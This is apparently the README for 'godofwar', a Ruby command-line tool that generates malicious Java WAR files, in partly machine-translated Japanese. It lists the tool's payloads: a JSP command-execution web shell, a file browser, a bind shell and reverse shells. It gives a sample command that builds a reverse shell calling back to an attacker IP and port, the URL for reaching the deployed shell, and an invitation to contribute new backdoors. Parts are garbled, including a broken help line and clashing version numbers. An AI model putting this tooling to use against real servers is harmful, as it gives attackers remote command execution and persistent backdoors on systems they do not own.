godofwar
1.0.0
Rubyで記述された、浸透テスト /赤いチーム化の目的で戦争ペイロードを生成するためのコマンドラインツール。
.
hhh
hhhhhhh
hhhhhhhh
hhhhhhhh+
hhhhhhhh'
hhhhhhhh.
hhhhhhhhh
..-- hhhhhhhhh
-sh/.. +. hhhhhhhhh:
/+/:-/+ss-` hhhhhhhhhh:
/MMM`ss:``.` hhhhhhhhhh:
.MMMMM: hhhhhhhhhhhhhhhhh:
MMMMMMM: hhhhhhhhhhhhhhhh:
MMMMMMMMMMMMM: hhhhhhhhhhhhhhhh`
:NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`
./:`smdo+oos++- `++sNMMMMMNmh+
.-y-` ` :. / -dmddhhhhh-
o/- `//o/ /M/ `+hhhhhhhh`
/o :yosmy +y .`.hhhhhhhho
+` /../.: `.y::hhhhhs:`
` `+yys` .sy` /oohhy:
`/:s/-`` `.hh`
..` ` y+
.hNNmmNdymmmmds` :-
hs. ``.. :y- `
-hhmNmddm+ .
`NMMMMMMm
` `oMMy
`. /Md- :o
MMMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMM.
`MMMMMMMMMMMMM.
:sNMMMNMdo:
``+m:/-
`
GodOfWar - Malicious Java WAR builder.
-l/--list )--host/--port ) $ gem install godofwar
$ godofwar -h
Help menu:
-p, --payload PAYLOAD Generates war from one of the available payloads.
(check -l/--list)
-H, --host IP_ADDR Local or Remote IP address for the chosen payload
(used with -p/--payload)
-P, --port PORT Local or Remote Port for the chosen payload
(used with -p/--payload)
-o, --output [FILE] Output file and the deployment name.
(default is the payload original name. check '-l/--list')
-l, --list list all available payloads.
-h, --help Show this help message.
すべてのペイロードをリストします
$ godofwar -l
├── cmd_get
│ └── Information:
│ ├── Description: Command execution via web interface
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/cmd.jsp?cmd=whoami
│ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│ └── Information:
│ ├── Description: Remote file browser, upload, download, unzip files and native command execution
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/filebrowser.jsp
│ ├── References: ["http://www.vonloesch.de/filebrowser.html"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│ └── Information:
│ ├── Description: TCP bind shell
│ ├── OS: any
│ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse-shell.jsp
│ ├── References: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│ └── Information:
│ ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell_ui.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│ └── Information:
│ ├── Description: TCP reverse shell. LHOST and LPORT are hardcoded
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
LHOSTとLPORTでペイロードを生成します
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
展開後、シェルにアクセスできます(http:// host:8080/puppy/puppy.jsp)
バックドアを追加することで貢献する:
payloads Directoryの下に新しいフォルダーを作成します。jspファイルを新しく作成したディレクトリの下に置きます(同じディレクトリ名にします)。payloads_info.jsonファイルを更新しますGEMは、MITライセンスの条件の下でオープンソースとして利用できます。
